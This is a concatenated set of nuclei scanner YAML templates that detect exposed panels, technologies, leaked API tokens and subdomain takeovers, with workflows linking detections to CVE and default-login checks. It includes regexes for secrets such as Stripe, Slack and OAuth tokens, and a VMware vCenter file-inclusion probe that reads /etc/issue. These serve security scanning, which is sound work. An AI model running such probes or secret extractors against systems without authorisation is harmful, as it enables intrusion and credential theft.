-------------------------------------------------------------------------------- /exposed-panels/couchdb-fauxton.yaml: -------------------------------------------------------------------------------- 1 | id: couchdb-fauxton 2 | 3 | info: 4 | name: Apache CouchDB Fauxton Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Project Fauxton' -------------------------------------------------------------------------------- /exposed-panels/flink-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: flink-exposure 2 | 3 | info: 4 | name: Apache Flink Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Apache Flink Web Dashboard' -------------------------------------------------------------------------------- /file/keys/credentials.yaml: -------------------------------------------------------------------------------- 1 | id: basic-auth-creds 2 | 3 | info: 4 | name: Basic Auth Credentials 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]" -------------------------------------------------------------------------------- /workflows/aem-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: aem-workflow 2 | 3 | info: 4 | name: Adobe Experience Manager Security Checks 5 | author: dhiyaneshDK 6 | description: A simple workflow that runs all Adobe Experience Manager related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/aem-detection.yaml 10 | subtemplates: 11 | - tags: aem -------------------------------------------------------------------------------- /workflows/harbor-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: harbor-workflow 2 | 3 | info: 4 | name: Harbor Security Checks 5 | author: pikpikcu 6 | description: A simple workflow that runs all Harbor related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/harbor-detect.yaml 10 | subtemplates: 11 | - template: cves/2019/CVE-2019-16097.yaml -------------------------------------------------------------------------------- /workflows/thinkcmf-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: thinkcmf-workflow 2 | info: 3 | name: ThinkCMF Security Checks 4 | author: pdteam 5 | description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target. 6 | 7 | workflows: 8 | - template: technologies/thinkcmf-detection.yaml 9 | subtemplates: 10 | - template: vulnerabilities/thinkcmf/ -------------------------------------------------------------------------------- /technologies/weblogic-detect.yaml: -------------------------------------------------------------------------------- 1 | id: weblogic-detect 2 | 3 | info: 4 | name: Detect Weblogic 5 | author: bing0o 6 | severity: info 7 | tags: tech,weblogic 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/console/login/LoginForm.jsp" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "WebLogic" 18 | -------------------------------------------------------------------------------- /exposed-panels/citrix-vpn-detect.yaml: -------------------------------------------------------------------------------- 1 | id: citrix-vpn-detect 2 | 3 | info: 4 | name: Citrix VPN Detection 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/vpn/index.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Citrix Gateway" 17 | -------------------------------------------------------------------------------- /exposed-panels/cx-cloud-login.yaml: -------------------------------------------------------------------------------- 1 | id: cx-cloud-login 2 | 3 | info: 4 | name: CX Cloud 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | - '{{BaseURL}}/cxcum/' 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "CX Cloud" -------------------------------------------------------------------------------- /exposed-panels/hadoop-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: hadoop-exposure 2 | 3 | info: 4 | name: Apache Hadoop Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/dfshealth.html' 13 | matchers: 14 | - type: word 15 | words: 16 | - '
Hadoop
' -------------------------------------------------------------------------------- /exposed-panels/kafka-connect-ui.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-connect-ui 2 | 3 | info: 4 | name: Apache Kafka Connect UI Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kafka 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Kafka Connect UI' -------------------------------------------------------------------------------- /exposed-panels/netscaler-gateway.yaml: -------------------------------------------------------------------------------- 1 | id: netscaler-gateway 2 | 3 | info: 4 | name: Netscaler gateway 5 | author: joeldeleep 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/vpn/index.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - Netscaler Gateway 17 | -------------------------------------------------------------------------------- /exposed-panels/rabbitmq-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: rabbitmq-dashboard 2 | 3 | info: 4 | name: RabbitMQ Dashboard 5 | author: fyoorer 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | matchers: 14 | - type: word 15 | words: 16 | - "RabbitMQ Management" 17 | part: body 18 | -------------------------------------------------------------------------------- /file/android/webview-javascript.yaml: -------------------------------------------------------------------------------- 1 | id: webview-javascript-enabled 2 | 3 | info: 4 | name: Webview JavaScript enabled 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V" -------------------------------------------------------------------------------- /workflows/cacti-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: cacti-workflow 2 | 3 | info: 4 | name: Cacti Checks 5 | author: pikpikcu 6 | description: A simple workflow that runs all Cacti related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/cacti-detect.yaml 10 | subtemplates: 11 | - template: vulnerabilities/other/cacti-weathermap-file-write.yaml -------------------------------------------------------------------------------- /workflows/liferay-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: liferay-workflow 2 | 3 | info: 4 | name: Liferay Security Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all liferay related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/liferay-portal-detect.yaml 10 | subtemplates: 11 | - template: cves/2020/CVE-2020-7961.yaml -------------------------------------------------------------------------------- /workflows/springboot-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: springboot-workflow 2 | 3 | info: 4 | name: Spring Boot Security Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all Spring Boot related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/springboot-actuator.yaml 10 | subtemplates: 11 | - tags: springboot 12 | -------------------------------------------------------------------------------- /file/keys/paypal-braintree-token.yaml: -------------------------------------------------------------------------------- 1 | id: paypal-braintree-token 2 | 3 | info: 4 | name: Paypal Braintree Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" -------------------------------------------------------------------------------- /exposed-panels/call-break-cms.yaml: -------------------------------------------------------------------------------- 1 | id: call-break-cms 2 | 3 | info: 4 | name: Call Break CMS 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Call Break CMS' 18 | condition: and 19 | -------------------------------------------------------------------------------- /file/android/certificate-validation.yaml: -------------------------------------------------------------------------------- 1 | id: improper-certificate-validation 2 | 3 | info: 4 | name: Improper Certificate Validation 5 | author: gaurang 6 | severity: medium 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/SslErrorHandler;->proceed()V" -------------------------------------------------------------------------------- /technologies/cockpit-detect.yaml: -------------------------------------------------------------------------------- 1 | id: cockpit-detect 2 | 3 | info: 4 | name: Detect Agentejo Cockpit 5 | author: dwisiswant0 6 | severity: info 7 | tags: tech,cockpit 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/auth/login" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Authenticate Please!" 17 | -------------------------------------------------------------------------------- /workflows/bigip-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: bigip-workflow 2 | 3 | info: 4 | name: F5 BIG-IP Security Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all BigIP related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/bigip-config-utility-detect.yaml 10 | subtemplates: 11 | - template: cves/2020/CVE-2020-5902.yaml 12 | -------------------------------------------------------------------------------- /.yamllint: -------------------------------------------------------------------------------- 1 | --- 2 | extends: default 3 | 4 | ignore: | 5 | .pre-commit-config.yaml 6 | .github/workflows/*.yml 7 | 8 | rules: 9 | document-start: disable 10 | line-length: disable 11 | new-lines: disable 12 | new-line-at-end-of-file: disable 13 | truthy: disable 14 | comments: 15 | require-starting-space: true 16 | ignore-shebangs: true 17 | min-spaces-from-content: 1 -------------------------------------------------------------------------------- /exposed-panels/kafka-topics-ui.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-topics-ui 2 | 3 | info: 4 | name: Apache Kafka Topics UI Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kafka 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Kafka Topics UI - Browse Kafka Data' -------------------------------------------------------------------------------- /exposed-panels/kubernetes-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-dashboard 2 | 3 | info: 4 | name: Kubernetes Console Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kubernetes,devops 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Kubernetes Dashboard" 17 | -------------------------------------------------------------------------------- /exposed-panels/rocketmq-console-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: rocketmq-console-exposure 2 | 3 | info: 4 | name: Apache RocketMQ Console Exposure 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "RocketMq-console-ng" -------------------------------------------------------------------------------- /file/keys/firebase-database.yaml: -------------------------------------------------------------------------------- 1 | id: firebase-database 2 | 3 | info: 4 | name: Firebase Database Detect 5 | author: gaurang 6 | severity: info 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "[a-z0-9.-]+\\.firebaseio\\.com" 17 | - "[a-z0-9.-]+\\.firebaseapp\\.com" -------------------------------------------------------------------------------- /file/keys/slack-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: slack-webhook 2 | 3 | info: 4 | name: Slack Webhook 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" 17 | -------------------------------------------------------------------------------- /exposed-panels/kronos-workforce-central.yaml: -------------------------------------------------------------------------------- 1 | id: kronos-workforce-central 2 | 3 | info: 4 | name: Kronos Workforce Central Panel 5 | author: emadshanab 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/wfc/portal' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Kronos Workforce Central' -------------------------------------------------------------------------------- /exposed-panels/zipkin-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: zipkin-exposure 2 | 3 | info: 4 | name: Zipkin Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/zipkin/" 14 | matchers: 15 | - type: word 16 | part: body 17 | words: 18 | - "webpackJsonpzipkin-lens" -------------------------------------------------------------------------------- /exposures/tokens/picatic/picatic-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: picatic-api-key 2 | 3 | info: 4 | name: Picatic API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'sk_live_[0-9a-z]{32}' -------------------------------------------------------------------------------- /file/keys/amazon-mws-auth-token.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-mws-auth-token-value 2 | 3 | info: 4 | name: Amazon MWS Auth Token 5 | author: gaurang 6 | severity: medium 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" -------------------------------------------------------------------------------- /vulnerabilities/wordpress/wp-xmlrpc.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-xmlrpc-file 2 | 3 | info: 4 | name: WordPress xmlrpc 5 | author: udit_thakkur 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xmlrpc.php" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'XML-RPC server accepts POST requests only.' 17 | -------------------------------------------------------------------------------- /workflows/netsweeper-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: netsweeper-workflow 2 | 3 | info: 4 | name: Netsweeper Security Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all netsweeper related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/netsweeper-webadmin-detect.yaml 10 | subtemplates: 11 | - template: cves/2020/CVE-2020-13167.yaml -------------------------------------------------------------------------------- /exposed-panels/kafka-monitoring.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-monitoring 2 | 3 | info: 4 | name: Apache Kafka Monitor Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kafka 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '>KafkaMonitor' 18 | - '>Kafka Monitor GUI' -------------------------------------------------------------------------------- /exposed-panels/mantis-detect.yaml: -------------------------------------------------------------------------------- 1 | id: mantis-detect 2 | 3 | info: 4 | name: Mantis portal detection 5 | author: makyotox 6 | severity: info 7 | tags: panel,mantis 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/login_page.php" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "MantisBT" 18 | part: body 19 | -------------------------------------------------------------------------------- /exposed-panels/solarwinds-orion.yaml: -------------------------------------------------------------------------------- 1 | id: solarwinds-orion 2 | 3 | info: 4 | name: SolarWinds Orion Panel 5 | author: puzzlepeaches 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/Orion/Login.aspx" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "SolarWinds Orion" 18 | part: body 19 | -------------------------------------------------------------------------------- /exposed-panels/sonarqube-login.yaml: -------------------------------------------------------------------------------- 1 | id: sonarqube-login 2 | 3 | info: 4 | name: SonarQube panel detect 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/sessions/new" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "SonarQube" 18 | part: body 19 | -------------------------------------------------------------------------------- /exposures/tokens/bitly/bitly-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: bitly-secret-key 2 | 3 | info: 4 | name: Bitly Secret Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,bitly 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'R_[0-9a-f]{32}' -------------------------------------------------------------------------------- /file/android/biometric-detect.yaml: -------------------------------------------------------------------------------- 1 | id: biometric-detect 2 | 3 | info: 4 | name: Biometric or Fingerprint detect 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "android.permission.USE_FINGERPRINT" 17 | - "android.permission.USE_BIOMETRIC" -------------------------------------------------------------------------------- /workflows/samsung-wlan-ap-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: samsung-wlan-ap-workflow 2 | 3 | info: 4 | name: Samsung Wlan AP (WEA453e) Checks 5 | author: pikpikcu 6 | description: A simple workflow that runs all samsung WlanAP related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: default-logins/samsung/samsung-wlan-ap-default-credentials.yaml 10 | - template: vulnerabilities/samsung/ -------------------------------------------------------------------------------- /dns/servfail-refused-hosts.yaml: -------------------------------------------------------------------------------- 1 | id: servfail-refused-hosts 2 | 3 | info: 4 | name: Servfail Host Finder 5 | author: pdteam 6 | severity: info 7 | tags: dns 8 | 9 | dns: 10 | - name: "{{FQDN}}" 11 | type: A 12 | class: inet 13 | recursion: true 14 | retries: 3 15 | matchers: 16 | - type: word 17 | words: 18 | - "SERVFAIL" 19 | - "REFUSED" 20 | -------------------------------------------------------------------------------- /exposed-panels/aims-password-mgmt-client.yaml: -------------------------------------------------------------------------------- 1 | id: aims-password-mgmt-client 2 | 3 | info: 4 | name: Aims Password Management Client Detect 5 | author: iamthefrogy 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/aims/ps/" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Avatier Corporation" 18 | -------------------------------------------------------------------------------- /exposed-panels/sonicwall-sslvpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sonicwall-sslvpn-panel 2 | 3 | info: 4 | name: SonicWall Virtual Office SSLVPN Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/cgi-bin/welcome" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Virtual Office" 17 | -------------------------------------------------------------------------------- /exposed-panels/supervpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: supervpn-detect 2 | 3 | info: 4 | name: SuperVPN panel detect 5 | author: organiccrap 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/login.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Sign In-SuperVPN" 17 | part: body 18 | -------------------------------------------------------------------------------- /exposures/tokens/newrelic/newrelic-admin-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-admin-api-key 2 | 3 | info: 4 | name: Admin API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRAA-[a-f0-9]{27}' -------------------------------------------------------------------------------- /exposures/tokens/newrelic/newrelic-rest-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-rest-api-key 2 | 3 | info: 4 | name: REST API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRRA-[a-f0-9]{42}' -------------------------------------------------------------------------------- /file/android/webview-universal-access.yaml: -------------------------------------------------------------------------------- 1 | id: webview-universal-access 2 | 3 | info: 4 | name: Webview Universal Access enabled 5 | author: gaurang 6 | severity: medium 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" -------------------------------------------------------------------------------- /network/smtp-detection.yaml: -------------------------------------------------------------------------------- 1 | id: smtp-service-detection 2 | 3 | info: 4 | name: SMTP Service Detection 5 | author: pussycat0x 6 | severity: info 7 | tags: network,service,smtp 8 | 9 | network: 10 | - inputs: 11 | - data: "\r\n" 12 | host: 13 | - "{{Hostname}}" 14 | - "{{Hostname}}:25" 15 | matchers: 16 | - type: word 17 | words: 18 | - "SMTP" 19 | -------------------------------------------------------------------------------- /technologies/maian-cart-detect.yaml: -------------------------------------------------------------------------------- 1 | id: maian-cart-detect 2 | 3 | info: 4 | name: Maian Cart Detection 5 | author: pdteam 6 | severity: info 7 | tags: tech,maian 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/favicon.ico" 13 | 14 | matchers: 15 | - type: dsl 16 | dsl: 17 | - "status_code==200 && (\"-498581627\" == mmh3(base64_py(body)))" -------------------------------------------------------------------------------- /technologies/s3-detect.yaml: -------------------------------------------------------------------------------- 1 | id: s3-detect 2 | 3 | info: 4 | name: Detect Amazon-S3 Bucket 5 | author: melbadry9 6 | severity: info 7 | tags: aws,s3,bucket,tech 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/%c0" 13 | matchers: 14 | - type: regex 15 | regex: 16 | - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" 17 | part: body 18 | -------------------------------------------------------------------------------- /technologies/sql-server-reporting.yaml: -------------------------------------------------------------------------------- 1 | id: sql-server-reporting 2 | 3 | info: 4 | name: Detect Microsoft SQL Server Reporting 5 | author: puzzlepeaches 6 | severity: info 7 | tags: tech,micrsoft 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/Reports/Pages/Folder.aspx" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Report Manager" 17 | -------------------------------------------------------------------------------- /vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml: -------------------------------------------------------------------------------- 1 | id: vmware-vcenter-lfi-linux 2 | 3 | info: 4 | name: Vmware Vcenter LFI for Linux appliances 5 | author: PR3R00T 6 | severity: high 7 | tags: vmware,lfi 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/eam/vib?id=/etc/issue" 13 | matchers: 14 | - type: word 15 | words: 16 | - "vCenter Server" -------------------------------------------------------------------------------- /workflows/rabbitmq-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: rabbitmq-workflow 2 | 3 | info: 4 | name: RabbitMQ Security Checks 5 | author: fyoorer 6 | description: A simple workflow that runs all rabbitmq related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/rabbitmq-dashboard.yaml 10 | 11 | subtemplates: 12 | - template: default-logins/rabbitmq/rabbitmq-default-admin.yaml -------------------------------------------------------------------------------- /exposed-panels/bazarr-login.yaml: -------------------------------------------------------------------------------- 1 | id: bazarr-login-detect 2 | 3 | info: 4 | name: Bazarr Login Detect 5 | author: r3dg33k 6 | severity: info 7 | reference: https://www.bazarr.media/ 8 | tags: panel,bazarr,login 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/login" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Bazarr' -------------------------------------------------------------------------------- /exposed-panels/compal-panel.yaml: -------------------------------------------------------------------------------- 1 | id: compal-panel-detect 2 | 3 | info: 4 | name: Compal CH7465LG panel detect 5 | author: fabaff 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/common_page/login.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "" 17 | part: body 18 | -------------------------------------------------------------------------------- /exposed-panels/saferoads-vms-login.yaml: -------------------------------------------------------------------------------- 1 | id: saferoads-vms-login 2 | 3 | info: 4 | name: Saferoads VMS Login 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | reference: https://www.exploit-db.com/ghdb/6941 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/login.html' 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Saferoads VMS' -------------------------------------------------------------------------------- /exposures/tokens/slack/slack-user-token.yaml: -------------------------------------------------------------------------------- 1 | id: slack-user-token 2 | 3 | info: 4 | name: Slack User token disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,slack 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "xoxp-[0-9A-Za-z\\-]{72}" -------------------------------------------------------------------------------- /exposures/tokens/stripe/stripe-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: stripe-secret-key 2 | 3 | info: 4 | name: Stripe Secret Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'sk_(?:live|test)_[0-9a-zA-Z]{24}' -------------------------------------------------------------------------------- /takeovers/urge-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: surge-takeover 2 | 3 | info: 4 | name: surge takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - project not found -------------------------------------------------------------------------------- /workflows/azkaban-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: azkaban-workflow 2 | 3 | info: 4 | name: Azkaban Security Checks 5 | author: pdteam 6 | description: A simple workflow that runs all Azkaban related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/azkaban-web-client.yaml 10 | subtemplates: 11 | - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml 12 | -------------------------------------------------------------------------------- /workflows/thinkphp-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: thinkphp-workflow 2 | info: 3 | name: ThinkPHP Security Checks 4 | author: dr_set 5 | description: A simple workflow that runs all ThinkPHP related nuclei templates on a given target. 6 | 7 | workflows: 8 | - template: technologies/tech-detect.yaml 9 | matchers: 10 | - name: thinkphp 11 | subtemplates: 12 | - template: vulnerabilities/thinkphp/ -------------------------------------------------------------------------------- /exposures/apis/wsdl-api.yaml: -------------------------------------------------------------------------------- 1 | id: wsdl-api 2 | 3 | info: 4 | name: wsdl-detect 5 | author: jarijaas 6 | severity: info 7 | tags: exposure,api 8 | description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/) 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/?wsdl" 14 | matchers: 15 | - type: word 16 | words: 17 | - "wsdl:definitions" -------------------------------------------------------------------------------- /exposures/tokens/google/oauth-access-key.yaml: -------------------------------------------------------------------------------- 1 | id: google-oauth-access-key 2 | 3 | info: 4 | name: Google OAuth Access Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'ya29\.[0-9A-Za-z\-_]+' -------------------------------------------------------------------------------- /exposures/tokens/newrelic/newrelic-insights-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-insights-key 2 | 3 | info: 4 | name: Insights Keys Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}' -------------------------------------------------------------------------------- /exposures/tokens/sendgrid/sendgrid-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: sendgrid-api-key 2 | 3 | info: 4 | name: Sendgrid API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}' -------------------------------------------------------------------------------- /exposures/tokens/slack/slack-bot-token.yaml: -------------------------------------------------------------------------------- 1 | id: slack-bot-token 2 | 3 | info: 4 | name: Slack access token 5 | author: nadino 6 | severity: info 7 | tags: exposure,token,slack 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "xoxb-[0-9A-Za-z\\-]{51}" -------------------------------------------------------------------------------- /file/android/webview-addjavascript-interface.yaml: -------------------------------------------------------------------------------- 1 | id: webview-addjavascript-interface 2 | 3 | info: 4 | name: Webview addJavascript Interface Usage 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 